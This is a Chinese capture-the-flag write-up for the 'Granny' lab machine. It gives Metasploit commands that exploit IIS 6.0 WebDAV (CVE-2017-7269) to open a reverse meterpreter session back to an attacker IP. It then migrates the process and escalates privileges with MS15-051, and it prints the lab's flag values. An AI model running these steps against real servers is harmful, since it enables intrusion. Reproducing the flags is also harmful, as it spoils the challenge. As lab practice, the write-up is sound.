本文主要是介绍[Meachines] [Easy] granny IIS 6.0+CVE-2017-7269+进程迁移+MS15-051权限提升,希望对大家解决编程问题提供一定的参考价值,需要的开发者们随着小编来一起学习吧!
信息收集
| IP Address | Opening Ports |
|---|---|
| 10.10.10.15 | TCP:80 |
$ nmap -p- 10.10.10.15 --min-rate 1000 -sC -sV -Pn
PORT STATE SERVICE VERSION
80/tcp open http Microsoft IIS httpd 6.0
|_http-server-header: Microsoft-IIS/6.0
| http-methods:
|_ Potentially risky methods: TRACE DELETE COPY MOVE PROPFIND PROPPATCH SEARCH MKCOL LOCK UNLOCK PUT
| http-webdav-scan:
| WebDAV type: Unknown
| Server Date: Thu, 22 Aug 2024 07:28:25 GMT
| Allowed Methods: OPTIONS, TRACE, GET, HEAD, DELETE, COPY, MOVE, PROPFIND, PROPPATCH, SEARCH, MKCOL, LOCK, UNLOCK
| Server Type: Microsoft-IIS/6.0
|_ Public Options: OPTIONS, TRACE, GET, HEAD, DELETE, PUT, POST, COPY, MOVE, MKCOL, PROPFIND, PROPPATCH, LOCK, UNLOCK, SEARCH
|_http-title: Under Construction
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
IIS 6.0 & CVE-2017-7269 & BOF
$ msfconsole
msf6 > use exploit/windows/iis/iis_webdav_scstoragepathfromurl
msf6 exploit(windows/iis/iis_webdav_scstoragepathfromurl) > set RHOSTS 10.10.10.15
msf6 exploit(windows/iis/iis_webdav_scstoragepathfromurl) > set LHOST 10.10.16.24
msf6 exploit(windows/iis/iis_webdav_scstoragepathfromurl) > run
meterpreter > bg
权限提升 & MS15-051
msf6 exploit(windows/iis/iis_webdav_scstoragepathfromurl) > use post/multi/recon/local_exploit_suggester
msf6 post(multi/recon/local_exploit_suggester) > set SESSION 1
msf6 post(multi/recon/local_exploit_suggester) > run
但是你如果尝试执行权限提升会出现错误
为了确保稳定,进程迁移到davcdata.exe
meterpreter > migrate 2732
msf6 post(multi/recon/local_exploit_suggester) > use exploit/windows/local/ms15_051_client_copy_image
msf6 exploit(windows/local/ms15_051_client_copy_image) > set LHOST 10.10.16.24
msf6 exploit(windows/local/ms15_051_client_copy_image) > set SESSION 1
msf6 exploit(windows/local/ms15_051_client_copy_image) > run
User.txt
700c5dc163014e22b3e408f8703f67d1
Root.txt
aa4beed1c0584445ab463a6747bd06e9
这篇关于[Meachines] [Easy] granny IIS 6.0+CVE-2017-7269+进程迁移+MS15-051权限提升的文章就介绍到这儿,希望我们推荐的文章对编程师们有所帮助!
![[Linux]:进程(下)](https://img-blog.csdnimg.cn/img_convert/f0c07e46c07b79a5f64d43840d99e37d.png)
